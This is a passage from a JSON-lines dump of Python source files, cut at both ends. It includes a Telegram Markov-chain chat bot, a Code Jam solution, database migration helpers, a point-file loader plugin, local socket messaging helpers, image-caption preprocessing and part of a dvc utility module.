params = {'chat_id': chat_id, 'photo': photo}\n resp = requests.get(self.api_url + method, params)\n print('send photo:', resp)\n\n def delete_webhook(self):\n method = 'deleteWebhook'\n requests.post(self.api_url + method)\n logging.warning(\"Webhook deleted\")\n\n\nclass Message:\n def __init__(self, data):\n self.chat_id = self.get(data, [\"message\", \"chat\", \"id\"])\n self.from_id = self.get(data, [\"message\", \"from\", \"id\"])\n self.text = self.get(data, [\"message\", \"text\"])\n self.reply_id = self.get(data, [\"message\", \"reply_to_message\", \"from\", \"id\"])\n\n @staticmethod\n def get(data, keys):\n if data.__contains__(keys[0]):\n first = keys[0]\n if len(keys) is 1:\n return data[first]\n else:\n keys.pop(0)\n return Message.get(data[first], keys)\n else:\n return None\n\n\nend = \"*END*\"\n\n\nclass Analyzer:\n owner_id = 433518097\n\n def __init__(self):\n self.persons = list()\n\n def analyze(self, data):\n message = Message(data)\n if (message.from_id == self.owner_id) and (message.reply_id is not None) and (message.chat_id is not None):\n self.say(message.chat_id, self.owner_id, message.text)\n return\n if (message.from_id == self.owner_id) and (message.text is not None):\n if message.text == \"Log\":\n print(self)\n return\n if message.text == \"Save\":\n self.save()\n print(\"Saved\")\n if message.chat_id is not None:\n self.bot_send_message(message.chat_id, \"Saved\")\n return\n if message.text == \"Load\":\n self.load()\n print(\"Loaded\")\n if message.chat_id is not None:\n self.bot_send_message(message.chat_id, \"Loaded\")\n return\n if message.text == \"Clean\":\n self.clean()\n print(\"Cleaned\")\n if message.chat_id is not None:\n self.bot_send_message(message.chat_id, \"Cleaned\")\n return\n if message.text == \"Голосовые?\":\n if message.chat_id is not None:\n self.bot_send_message(message.chat_id, \"И каким хуем я должен слушать эти голосовые?\")\n return\n if (message.from_id is not None) and (message.text is not None):\n if message.text.startswith(\"Generate \"):\n self.say(message.chat_id, message.from_id, message.text[9:])\n return\n self.add(message.from_id, message.text)\n return\n\n def add(self, person, text):\n if person not in self.persons:\n self.persons.append(Person(person))\n index = self.persons.index(person)\n self.persons[index].add(text)\n\n def generate(self, person, count):\n if not self.persons.__contains__(person):\n return \"No data about this person\"\n index = self.persons.index(person)\n return self.persons[index].generate(count)\n\n def say(self, chat, person, count):\n count = self.try_int(count)\n if count is None:\n print(\"Invalid count\")\n self.bot_send_message(chat, \"Invalid count\")\n return\n text = self.generate(person, count)\n self.bot_send_message(chat, text)\n print(\"Generated text with length\", count, \" by person \", person)\n\n def save(self):\n pickle.dump(self.persons, open('data.bot', 'wb'), protocol=pickle.HIGHEST_PROTOCOL)\n\n def load(self):\n self.persons = pickle.load(open('data.bot', 'rb'))\n\n def clean(self):\n self.persons = list()\n\n @staticmethod\n def bot_send_message(chat_id, text):\n bot.send_message(chat_id, text)\n\n @staticmethod\n def try_int(value):\n try:\n return int(value)\n except ValueError:\n return None\n\n def __repr__(self):\n return self.persons.__repr__()\n\n\nclass Person:\n def __init__(self, uid):\n self.uid = uid\n self.dictionary = dict()\n self.generator = None\n\n def __gt__(self, other):\n return self.uid > other\n\n def __eq__(self, other):\n return self.uid == other\n\n def add(self, text):\n self.generator = None\n\n r = re.compile(\"[а-яА-Я.]+\")\n text = text.lower() + \".\"\n words = list()\n for w in filter(r.match, text.split()):\n word = w.translate(str.maketrans('', '', string.punctuation))\n if len(w) > 0:\n words.append(word)\n if w.__contains__('.') or w.__contains__(','):\n words.append(end)\n print(words)\n\n if len(words) == 0:\n return\n last = end\n for word in words:\n if last not in self.dictionary:\n self.dictionary[last] = Chain()\n self.dictionary[last].add(word)\n last = word\n\n def generate(self, count):\n if self.generator is None:\n self.generator = Generator()\n [self.generator.add(word, chain) for word, chain in self.dictionary.items()]\n return self.generator.generate(count)\n\n def __repr__(self):\n return \"\\n\" + str(self.uid) + \": \" + self.dictionary.__repr__()\n\n\nclass Chain:\n def __init__(self):\n self.continuation = dict()\n\n def add(self, text):\n if text not in self.continuation:\n self.continuation[text] = 0\n self.continuation[text] += 1\n\n def get(self):\n return self.continuation\n\n def __repr__(self):\n return self.continuation.__repr__()\n\n\nclass Generator:\n def __init__(self):\n self.next = dict()\n\n def add(self, word, chain):\n words = [word for word in chain.get()]\n self.next[word] = words\n\n def generate(self, count):\n def sentence_end():\n nonlocal capitalize\n endings = [('. ', 100, True), ('! ', 20, True), ('\\n', 75, True), (', ', 150, False), (' ', 85, False)]\n s = sum([ending[1] for ending in endings])\n r = int(random_generator.random() * s)\n s = 0\n for ending in endings:\n char, probability, capital = ending\n s += probability\n if s >= r:\n capitalize = capital\n return char\n punctuations = ['.', '!', ',', '\\n', ' ']\n text = ''\n word = end\n i = 0\n capitalize = True\n while True:\n size = len(self.next[word])\n rand = int(random_generator.random() * size)\n word = self.next[word][rand]\n if word == end:\n text = text[:-1] + sentence_end()\n if i >= count:\n break\n else:\n w = word\n if capitalize:\n w = word.title()\n capitalize = False\n text += w + ' '\n i += 1\n while text[-1:] in punctuations:\n text = text[:-1]\n return text\n\n\ndef get_token(name):\n config_file_name = 'config.json'\n try:\n if os.path.isfile(config_file_name):\n with open(config_file_name) as config_file:\n config = json.load(config_file)\n if config.__contains__(name):\n return config[name]\n else:\n print(\"CRITICAL: cannot get token in config file \" + name)\n logging.critical(\"Cannot get token in config file \" + name)\n else:\n if os.environ.__contains__(name):\n return os.environ[name]\n else:\n print(\"CRITICAL: cannot get token in OS environment \" + name)\n logging.critical(\"Cannot get token in OS environment \" + name)\n except Exception as error:\n print(\"CRITICAL: cannot get token, reason: \" + error.__str__())\n logging.critical(\"Cannot get token, reason: \" + error.__str__())\n\n\nbot = BotHandler(get_token(\"TELEGRAM_BOT_TOKEN\"))\nrandom_generator = random.Random()\n\n\ndef main():\n logging.basicConfig(filename=\"logs.log\", level=logging.INFO)\n offset = None\n\n analyzer = Analyzer()\n analyzer.load()\n\n while True:\n bot.get_updates(offset)\n data = bot.get_last_update()\n if data == '':\n continue\n last_update_id = data['update_id']\n offset = last_update_id + 1\n\n logging.info(data)\n analyzer.analyze(data)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n exit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423276894","text":"#!/usr/bin/env python3\n\n# ZERO -> Z\n# SIX -> X\n# TWO -> W\n# SEVEN -> S\n# EIGHT -> G\n# FIVE -> V\n# THREE -> H\n# FOUR -> U\n# ONE -> O\n# NINE -> I\n\nnumbers = [\n (0, 'Z', 'ZERO'),\n (6, 'X', 'SIX'),\n (2, 'W', 'TWO'),\n (7, 'S', 'SEVEN'),\n (8, 'G', 'EIGHT'),\n (5, 'V', 'FIVE'),\n (3, 'H', 'THREE'),\n (4, 'U', 'FOUR'),\n (1, 'O', 'ONE'),\n (9, 'I', 'NINE'),\n]\n\ndef remove_word(counts, word):\n for letter in word:\n counts[letter] -= 1\n\nT = int(input())\nfor t in range(T):\n word = input()\n counts = {}\n for letter in word:\n if letter in counts:\n counts[letter] += 1\n else:\n counts[letter] = 1\n digit_counts = {}\n for digit, letter, word in numbers:\n count = 0\n while letter in counts and counts[letter]:\n remove_word(counts, word)\n count += 1\n digit_counts[digit] = count\n for v in counts.values():\n assert v == 0\n answer = ''\n for digit in range(10):\n answer += str(digit) * digit_counts[digit]\n print('Case #{}: {}'.format(t+1, answer))\n","sub_path":"solutions_5648941810974720_1/Python/k21/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"350840976","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"Module contains utils for external CADs.\"\"\"\n\nimport sqlalchemy as sa\n\nfrom ggrc.migrations import utils\n\n\nCADS_BY_OBJECT_TYPE_SQL = u'''\n SELECT\n id,\n definition_type,\n attribute_type,\n multi_choice_options,\n mandatory,\n helptext,\n placeholder,\n context_id,\n updated_at,\n modified_by_id,\n created_at,\n title\n FROM\n custom_attribute_definitions\n WHERE\n definition_type = :object_type\n'''\n\nPROPAGATE_EXTERNAL_CADS_BY_CADS_SQL = u'''\n INSERT INTO external_custom_attribute_definitions (\n id,\n definition_type,\n attribute_type,\n multi_choice_options,\n mandatory,\n helptext,\n placeholder,\n context_id,\n updated_at,\n modified_by_id,\n created_at,\n title\n ) VALUES (\n :id,\n :definition_type,\n :attribute_type,\n :multi_choice_options,\n :mandatory,\n :helptext,\n :placeholder,\n :context_id,\n :updated_at,\n :modified_by_id,\n :created_at,\n :title\n )\n'''\n\n\ndef _get_cads(connection, object_type):\n \"\"\"Returns CADs by object type.\n\n Args:\n connection: sqlalchemy.engine.Connection object.\n object_type: String representation of object type.\n\n Returns:\n cads: List of CADs objects.\n \"\"\"\n cads = connection.execute(\n sa.text(CADS_BY_OBJECT_TYPE_SQL),\n object_type=object_type\n ).fetchall()\n\n return cads\n\n\ndef _propagate_external_cads(connection, cads):\n \"\"\"Propagates external CADs by CADs.\n\n Args:\n connection: sqlalchemy.engine.Connection object.\n cads: List of CADs objects.\n \"\"\"\n for cad in cads:\n connection.execute(\n sa.text(PROPAGATE_EXTERNAL_CADS_BY_CADS_SQL),\n definition_type=cad.definition_type,\n attribute_type=cad.attribute_type,\n multi_choice_options=cad.multi_choice_options,\n mandatory=cad.mandatory,\n helptext=cad.helptext,\n placeholder=cad.placeholder,\n context_id=cad.context_id,\n updated_at=cad.updated_at,\n modified_by_id=cad.modified_by_id,\n created_at=cad.created_at,\n title=cad.title,\n id=cad.id\n )\n\n\ndef _add_revisions(connection, cads):\n \"\"\"Adds CADs to objects without revisions.\n\n Args:\n connection: sqlalchemy.engine.Connection object.\n cads: List of CADs objects.\n \"\"\"\n cad_ids = [cad.id for cad in cads]\n utils.add_to_objects_without_revisions_bulk(\n connection,\n cad_ids,\n \"ExternalCustomAttributeDefinition\",\n \"created\"\n )\n\n\ndef migrate_to_external_cads(connection, obj_type):\n \"\"\"Migrates CADs to external CADs for object type.\n\n Args:\n connection: An instance of SQLAlchemy connection.\n obj_type: String representation of object type.\n \"\"\"\n cads = _get_cads(connection, obj_type)\n _propagate_external_cads(connection, cads)\n _add_revisions(connection, cads)\n","sub_path":"src/ggrc/migrations/utils/external_cads.py","file_name":"external_cads.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"490031692","text":"\n\"\"\"\nRead sparse points from a text file.\n\nThe sparse points file makes it possible to load individual point data into the 3D space defined \nthe volume image. \n\nThe sparse points file may have one of two formats.\nIn both cases it's one row per data point. \nThere is no header that contains information on what the columns are.\n\nONE:\nz_position,x_position,y_position\\n\nz_position,x_position,y_position\\n\n...\n\n\nTWO\nz_position,x_position,y_position,data_series_number\\n\nz_position,x_position,y_position,data_series_number\\n\n...\n\n\nIn the second format, each data point is associated with a scalar value.\nAll points with the same scalar value are grouped together as one ingredient. \nThis allows points of different sorts to be overlaid easily on the same \nimage and have their properties changed together. \n\n\n\"\"\"\n\n\nimport os\nfrom lasagna_plugin import lasagna_plugin\nfrom elastix_io import read_pts_file\nimport numpy as np\nfrom PyQt5 import QtGui\n\n\nclass loaderClass(lasagna_plugin):\n def __init__(self,lasagna):\n super(loaderClass,self).__init__(lasagna)\n\n self.lasagna = lasagna\n self.objectName = 'sparse_point_reader'\n self.kind = 'sparsepoints'\n # Construct the QActions and other stuff required to integrate the load dialog into the menu\n self.loadAction = QtGui.QAction(self.lasagna) # Instantiate the menu action\n\n # Add an icon to the action\n iconLoadOverlay = QtGui.QIcon()\n iconLoadOverlay.addPixmap(QtGui.QPixmap(\":/actions/icons/points.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.loadAction.setIcon(iconLoadOverlay)\n\n # Insert the action into the menu\n self.loadAction.setObjectName(\"sparsePointRead\")\n self.lasagna.menuLoad_ingredient.addAction(self.loadAction)\n self.loadAction.setText(\"Sparse point read\")\n\n self.loadAction.triggered.connect(self.showLoadDialog) # Link the action to the slot\n\n # Slots follow\n\n def showLoadDialog(self, fname=None):\n \"\"\"\n This slot brings up the load dialog and retrieves the file name.\n If a filename is provided then this is loaded and no dialog is brought up.\n If the file name is valid, it loads the base stack using the load method.\n\n \"\"\"\n \n if fname is None or fname is False:\n fname = self.lasagna.showFileLoadDialog(fileFilter=\"Text Files (*.txt *.csv *.pts)\")\n\n if fname is None or fname is False:\n return\n\n if os.path.isfile(fname):\n if fname.endswith('.pts'):\n data, roi_type = read_pts_file(fname)\n if roi_type == 'point':\n print('!!! WARNING points are set in real world coordinates. I assume a pixel size of 1')\n else:\n with open(str(fname), 'r') as fid:\n contents = fid.read()\n\n # a list of strings with each string being one line from the file\n asList = contents.split('\\n')\n data = []\n for ii in range(len(asList)):\n if len(asList[ii]) == 0:\n continue\n data.append([float(x) for x in asList[ii].split(',')])\n\n # A point series should be a list of lists where each list has a length of 3,\n # corresponding to the position of each point in 3D space. However, point\n # series could also have a length of 4. If this is the case, the fourth \n # value is the index of the series. This allows a single file to hold multiple\n # different point series. We handle these two cases differently. First we deal\n # with the the standard case:\n if len(data[0]) == 3:\n # Create an ingredient with the same name as the file name \n objName = fname.split(os.path.sep)[-1]\n self.lasagna.addIngredient(objectName=objName,\n kind=self.kind,\n data=np.asarray(data),\n fname=fname\n )\n # Add this ingredient to all three plots\n self.lasagna.returnIngredientByName(objName).addToPlots() \n # Update the plots\n self.lasagna.initialiseAxes()\n\n elif len(data[0]) == 4:\n # What are the unique data series values?\n dSeries = [x[3] for x in data]\n dSeries = list(set(dSeries))\n \n # Loop through these unique series and add as separate sparse point objects\n\n for thisIndex in dSeries:\n tmp = []\n for thisRow in data:\n if thisRow[3] == thisIndex:\n tmp.append(thisRow[:3])\n\n print(\"Adding point series %d with %d points\" % (thisIndex,len(tmp)))\n\n # Create an ingredient with the same name as the file name \n objName = \"%s #%d\" % (fname.split(os.path.sep)[-1],thisIndex)\n\n self.lasagna.addIngredient(objectName=objName,\n kind=self.kind,\n data=np.asarray(tmp),\n fname=fname\n )\n\n # Add this ingredient to all three plots\n self.lasagna.returnIngredientByName(objName).addToPlots() \n\n # Update the plots\n self.lasagna.initialiseAxes()\n\n else:\n print((\"Point series has %d columns. Only 3 or 4 columns are supported\" % len(data[1])))\n\n else:\n self.lasagna.statusBar.showMessage(\"Unable to find \" + str(fname))\n","sub_path":"IO/sparse_point_reader_plugin.py","file_name":"sparse_point_reader_plugin.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53069451","text":"import shutil\nimport socket\nimport json\nimport time\nimport sys\nimport sh\n\n# For TCP messaging\n# Where message_dict is something like {\"message_type\": \"heartbeat\", \"worker_pid\": 3}\ndef send_message(message_dict, host, port_to_send_to):\n\t'''\n\tprint('\\n==========================================================')\n\tprint('[TCP] Attempting to send message to [HOST: {} PORT: {}]'.format(host, port_to_send_to))\n\tprint('==========================================================\\n')\n\t'''\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((host, port_to_send_to))\n\tdata = json.dumps(message_dict)\n\ts.sendall(data.encode(\"utf-8\"))\n\ts.close()\n\n# For TCP listening\n# Has a worker or master listen for messages and then act on each received message\n# via the handle_message function\ndef listen_and_act_helper(handle_message, host, port_to_listen_on, agent=False):\n\t'''\n\tprint('\\n==========================================================')\n\tprint('[TCP] Attempting to listen in on [HOST: {} PORT: {}]'.format(host, port_to_listen_on))\n\tprint('==========================================================\\n')\n\t'''\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.bind((host, port_to_listen_on))\n\ts.listen(5)\n\n\t# Worker needs to register here in order to avoid a race condition.\n\t# If master is calling this function, agent defaults to False, and\n\t# this will be skipped\n\tif agent:\n\t\tagent.register()\n\n\twhile True:\n\t\tclientsocket, address = s.accept()\n\t\tmax_data = 1024\n\n\t\twhile True:\n\t\t\tmessage = clientsocket.recv(max_data).decode('utf-8')\n\t\t\tmessage_dict = json.loads(message) # Convert string to dict\n\t\t\thandle_message(message_dict)\n\n\t\t\tif len(message) != max_data:\n\t\t\t\tbreak\n\n\t\tclientsocket.close()\n\n# For UDP messaging\ndef udp_send_message(message_dict, host, port_to_send_to):\n\t'''\n\tprint('\\n==========================================================')\n\tprint('[UDP] Attempting to send datagram to [HOST: {} PORT: {}]'.format(host, port_to_send_to))\n\tprint('==========================================================\\n')\n\t'''\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\tdata = json.dumps(message_dict)\n\ts.sendto(bytes(data.encode(\"utf-8\")), (host, port_to_send_to))\n\n# For UDP listening\n# Has master listen for messages and then act on each received message via the handle_message function\ndef udp_listen_and_act(handle_message, host, port_to_listen_on):\n\tprint('\\n==========================================================')\n\tprint('[UDP] Attempting to listen in on [HOST: {} PORT: {}]'.format(host, port_to_listen_on))\n\tprint('==========================================================\\n')\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ts.bind((\"\", port_to_listen_on))\n\twhile True:\n\t\tdata, addr = s.recvfrom(1024)\n\t\tmessage = data.decode('utf-8') # Message is sent as byte string; must be decoded\n\t\tmessage_dict = json.loads(message) # Convert string to dict\n\t\thandle_message(message_dict)\n\n# Returns the port the master lives on and the server's host address\ndef assign_host_and_ports():\n\thost = \"localhost\"\n\tudp_port = 8000 # Change to 1 for autograder submission; 8000 for local testing\n\tprint('\\n\\n\\===================================================================================')\n\tprint('Setting UDP port to {}. Needs to be set to 1 for submission, 8000 for local testing'.format(udp_port))\n\tprint('===================================================================================\\n\\n')\n\treturn host, udp_port\n\n# Merge input files into one output file\ndef merge_files(input_files, output_file):\n\twith open(output_file, 'a+') as outfile:\n\t\t# message['input_file'] is a list of input files, so we have to loop thru each one\n\t\tfor input_file in input_files:\n\t\t\twith open(input_file) as infile:\n\t\t\t\tshutil.copyfileobj(infile, outfile)\n\ndef prepend_input_dir(files, input_dir):\n\tif input_dir[-1] == '/':\n\t\tfiles = [input_dir + file for file in files]\n\telse: \n\t\tfiles = [input_dir + '/' + file for file in files]\n\treturn files","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308050925","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-intel/egg/cpip/CppCondGraphToHtml.py\n# Compiled at: 2017-10-03 13:07:16\n\"\"\"Writes out the Cpp Conditional processing graph as HTML.\"\"\"\n__author__ = 'Paul Ross'\n__date__ = '2011-07-10'\n__rights__ = 'Copyright (c) 2008-2017 Paul Ross'\nimport os, cpip\nfrom cpip.core import CppCond\nfrom cpip.util import XmlWrite\nfrom cpip.util import HtmlUtils\nfrom cpip import TokenCss\n\ndef linkToIndex(theS, theIdxPath):\n with XmlWrite.Element(theS, 'p'):\n theS.characters('Return to ')\n with XmlWrite.Element(theS, 'a', {'href': theIdxPath}):\n theS.characters('Index')\n\n\nclass CcgVisitorToHtml(CppCond.CppCondGraphVisitorBase):\n \"\"\"Writing CppCondGraph visitor object.\"\"\"\n PAD_STR = ' '\n\n def __init__(self, theHtmlStream):\n \"\"\"Constructor with an output XmlWrite.XhtmlStream and\n a a TuIndexer.TuIndexer object.\"\"\"\n super(CcgVisitorToHtml, self).__init__()\n self._hs = theHtmlStream\n\n def visitPre(self, theCcgNode, theDepth):\n \"\"\"Pre-traversal call with a CppCondGraphNode and the integer depth in\n the tree.\"\"\"\n self._hs.characters(self.PAD_STR * theDepth)\n if theCcgNode.state:\n myCssClass = 'CcgNodeTrue'\n else:\n myCssClass = 'CcgNodeFalse'\n with XmlWrite.Element(self._hs, 'span', {'class': myCssClass}):\n self._hs.characters('#%s' % theCcgNode.cppDirective)\n if theCcgNode.constExpr is not None:\n self._hs.characters(' %s' % theCcgNode.constExpr)\n self._hs.characters(' ')\n self._hs.characters(' /* ')\n HtmlUtils.writeHtmlFileLink(self._hs, theCcgNode.fileId, theCcgNode.lineNum, os.path.basename(theCcgNode.fileId), theClass=None)\n self._hs.characters(' */')\n self._hs.characters('\\n')\n return\n\n def visitPost(self, theCcgNode, theDepth):\n \"\"\"Post-traversal call with a CppCondGraphNode and the integer depth in\n the tree.\"\"\"\n pass\n\n\ndef processCppCondGrphToHtml(theLex, theHtmlPath, theTitle, theIdxPath):\n \"\"\"Given the PpLexer write out the Cpp Cond Graph to the HTML file.\n theLex is a PpLexer.\n theHtmlPath is the file path of the output.\n theTitle is the page title.\n theIdxPath is the file name of the index page.\n theTuIndexer is a TuIndexer.TuIndexer object.\"\"\"\n if not os.path.exists(os.path.dirname(theHtmlPath)):\n os.makedirs(os.path.dirname(theHtmlPath))\n with XmlWrite.XhtmlStream(theHtmlPath, mustIndent=cpip.INDENT_ML) as (myS):\n with XmlWrite.Element(myS, 'head'):\n with XmlWrite.Element(myS, 'link', {'href': TokenCss.TT_CSS_FILE, \n 'type': 'text/css', \n 'rel': 'stylesheet'}):\n pass\n with XmlWrite.Element(myS, 'title'):\n myS.characters(theTitle)\n with XmlWrite.Element(myS, 'body'):\n with XmlWrite.Element(myS, 'h1'):\n myS.characters('Preprocessing Conditional Compilation Graph: %s' % theLex.tuFileId)\n with XmlWrite.Element(myS, 'p'):\n myS.characters('The conditional compilation statements as green (i.e. evaluates as True)\\nand red (evaluates as False). Each statement is linked to the source code it came from.\\n')\n linkToIndex(myS, theIdxPath)\n with XmlWrite.Element(myS, 'pre'):\n myVisitor = CcgVisitorToHtml(myS)\n theLex.condCompGraph.visit(myVisitor)","sub_path":"pycfiles/cpip-0.9.7-py2.7/CppCondGraphToHtml.py","file_name":"CppCondGraphToHtml.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"23895407","text":"import string\nimport glob\nimport pickle as pickle\nimport common_functions as common_functions\n\n\ndef read_descriptions_file(document):\n\timage_description_mappings = dict()\n\tfor line in document.split('\\n'):\n\t\ttokens = line.split()\n\t\tif len(line) < 2:\n\t\t\tcontinue\n\t\tid, descriptions = tokens[0], tokens[1:]\n\t\tid = id.split('.')[0]\n\t\tdescriptions = ' '.join(descriptions)\n\t\tif id not in image_description_mappings:\n\t\t\timage_description_mappings[id] = list()\n\t\timage_description_mappings[id].append(descriptions)\n\treturn image_description_mappings\n\n\ndef clean_description_data(descriptions):\n\t# Replace all punctuations to empty character\n\tremove_punctuation = str.maketrans('', '', string.punctuation)\n\tfor key, list_of_descriptions in descriptions.items():\n\t\tfor i in range(len(list_of_descriptions)):\n\t\t\tdescription = list_of_descriptions[i]\n\t\t\tdescription = description.split()\n\t\t\t# convert all the words to lowercase\n\t\t\tdescription = [word.lower() for word in description]\n\t\t\t# Remove all punctuations\n\t\t\tdescription = [w.translate(remove_punctuation) for w in description]\n\t\t\t# Remove any word whose length is less than 1\n\t\t\tdescription = [word for word in description if len(word)>1]\n\t\t\t# Remove any word whose conetents are not alphabets\n\t\t\tdescription = [word for word in description if word.isalpha()]\n\t\t\tlist_of_descriptions[i] = ' '.join(description)\n\n\n\n# save the descriptions to a text file\ndef save_to_file(descriptions, filename):\n\tlines_in_file = list()\n\tfor key, descriptions_list in descriptions.items():\n\t\tfor desc in descriptions_list:\n\t\t\tlines_in_file.append(key + ' ' + desc)\n\tdescriptions_data = '\\n'.join(lines_in_file)\n\twith open(filename, 'w') as f:\n\t\tf.write(descriptions_data)\n\n\n# load a pre-defined list of image file names\ndef load_set(filename):\n\tdocument = common_functions.read_document(filename)\n\tlist_of_file_names = list()\n\tfor line in document.split('\\n'):\n\t\tif len(line) >= 1:\n\t\t\t# get the image name\n\t\t\timage_name = line.split('.')[0]\n\t\t\tlist_of_file_names.append(image_name)\n\treturn set(list_of_file_names)\n\n\n# load the descriptions from file into memory\ndef load_clean_descriptions(filename, dataset):\n\tdoc = common_functions.read_document(filename)\n\tdescriptions = dict()\n\tfor line in doc.split('\\n'):\n\t\ttokens_in_each_line = line.split()\n\t\tid, description = tokens_in_each_line[0], tokens_in_each_line[1:]\n\t\tif id in dataset:\n\t\t\tif id not in descriptions:\n\t\t\t\tdescriptions[id] = list()\n\t\t\tdescription = 'captStrt ' + ' '.join(description) + ' captEnd'\n\t\t\tdescriptions[id].append(description)\n\treturn descriptions\n\n\n# convert a dictionary of clean descriptions to a list of descriptions\ndef to_lines(descriptions):\n\tall_desc = list()\n\tfor key in descriptions.keys():\n\t\t[all_desc.append(d) for d in descriptions[key]]\n\treturn all_desc\n\n\n# calculate the length of the description with the most words\ndef get_max_length(descriptions):\n\tall_descriptions = list()\n\tfor key in descriptions.keys():\n\t\t[all_descriptions.append(d) for d in descriptions[key]]\n\treturn max(len(d.split()) for d in all_descriptions)\n\n\ndef pre_process_captions(class_name):\n\tif class_name == \"general\":\n\t\tfilename = \"Dataset/general_captions/Flickr8k.token.txt\"\n\t\tdocument = common_functions.read_document(filename)\n\t\tprint(document[:300])\n\n\t\tdescriptions = read_descriptions_file(document)\n\n\t\tclean_description_data(descriptions)\n\n\t\tsave_to_file(descriptions, 'Descriptions/' + class_name + '_' + 'descriptions.txt')\n\n\t\tfilename = 'Dataset/general_captions/Flickr_8k.trainImages.txt'\n\t\ttrain = load_set(filename)\n\t\tprint('Loading the training Dataset: %d' % len(train))\n\n\t\timages_path = 'Dataset/general_images/'\n\t\tlist_of_images = glob.glob(images_path + '*.jpg')\n\n\t\ttrain_images_file = 'Dataset/general_captions/Flickr_8k.trainImages.txt'\n\t\t# Read the train image names in a set\n\t\ttrain_images = set(open(train_images_file, 'r').read().strip().split('\\n'))\n\n\t\t# this contains all the training images\n\t\ttrain_img = []\n\n\t\tfor i in list_of_images: # img is list of full path names of all images\n\t\t\tif i[len(images_path):] in train_images: # Check if the image belongs to training set\n\t\t\t\ttrain_img.append(i) # Add it to the list of train images\n\n\t\t# descriptions\n\t\ttrain_descriptions = load_clean_descriptions(\"Descriptions/\"+class_name+'_descriptions.txt', train)\n\t\tprint('Descriptions: train=%d' % len(train_descriptions))\n\n\t\t# Create a list of all the training captions\n\t\ttraining_captions = []\n\t\tfor key, value in train_descriptions.items():\n\t\t\tfor caption in value:\n\t\t\t\ttraining_captions.append(caption)\n\t\tlen(training_captions)\n\n\t\t# Pick words that occur more than 10 times.\n\t\tword_count_threshold = 10\n\t\tword_counts = {}\n\t\tsentence_count = 0\n\t\tfor sentence in training_captions:\n\t\t\tsentence_count += 1\n\t\t\tfor w in sentence.split(' '):\n\t\t\t\tword_counts[w] = word_counts.get(w, 0) + 1\n\n\t\tvocabulary = [w for w in word_counts if word_counts[w] >= word_count_threshold]\n\n\t\tindex_to_word = {}\n\t\tword_to_index = {}\n\n\t\tindex = 1\n\t\tfor w in vocabulary:\n\t\t\tword_to_index[w] = index\n\t\t\tindex_to_word[index] = w\n\t\t\tindex += 1\n\n\t\tvocab_size = len(index_to_word) + 1 # one for appended 0's\n\n\t\tmax_length = get_max_length(train_descriptions)\n\t\tprint('Max Description Length Length: ', max_length)\n\n\t\twith open(\"Pickle/general_wordtoix.pkl\", \"wb\") as encoded_pickle:\n\t\t\tpickle.dump(word_to_index, encoded_pickle)\n\n\t\twith open(\"Pickle/general_ixtoword.pkl\", \"wb\") as encoded_pickle:\n\t\t\tpickle.dump(index_to_word, encoded_pickle)\n\n\t\twith open(\"Pickle/general_max_length.pkl\", \"wb\") as encoded_pickle:\n\t\t\tpickle.dump(max_length, encoded_pickle)\n\n\t\treturn max_length, vocab_size, train_descriptions, train_img, word_to_index\n\n\n\n\n\n","sub_path":"pre_processing_caption.py","file_name":"pre_processing_caption.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"284578785","text":"from __future__ import unicode_literals\n\nimport errno\nimport logging\nimport os\nimport shutil\nimport stat\n\nimport nanotime\nfrom shortuuid import uuid\n\nfrom dvc.exceptions import DvcException\nfrom dvc.system import System\nfrom dvc.utils import dict_md5\nfrom dvc.utils import fspath\nfrom dvc.utils import fspath_py35\nfrom dvc.utils import relpath\nfrom dvc.utils import walk_files\nfrom dvc.utils.compat import str\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_inode(path):\n inode = System.inode(path)\n logger.debug(\"Path {} inode {}\".format(path, inode))\n return inode\n\n\ndef get_mtime_and_size(path, dvcignore):\n if os.path.isdir(fspath_py35(path)):\n size = 0\n files_mtimes = {}\n for file_path in walk_files(path, dvcignore):\n try:\n stat = os.stat(file_path)\n except OSError as exc:\n # NOTE: broken symlink case.\n if exc.errno != errno.ENOENT:\n raise\n continue\n size += stat.st_size\n files_mtimes[file_path] = stat.st_mtime\n\n # We track file changes and moves, which cannot be detected with simply\n # max(mtime(f) for f in non_ignored_files)\n mtime = dict_md5(files_mtimes)\n else:\n base_stat = os.stat(fspath_py35(path))\n size = base_stat.st_size\n mtime = base_stat.st_mtime\n mtime = int(nanotime.timestamp(mtime))\n\n # State of files handled by dvc is stored in db as TEXT.\n # We cast results to string for later comparisons with stored values.\n return str(mtime), str(size)\n\n\nclass BasePathNotInCheckedPathException(DvcException):\n def __init__(self, path, base_path):\n msg = \"Path: {} does not overlap with base path: {}\".format(\n path, base_path\n )\n super(DvcException, self).__init__(msg)\n\n\ndef contains_symlink_up_to(path, base_path):\n base_path = fspath(base_path)\n path = fspath(path)\n\n if base_path not in path:\n raise 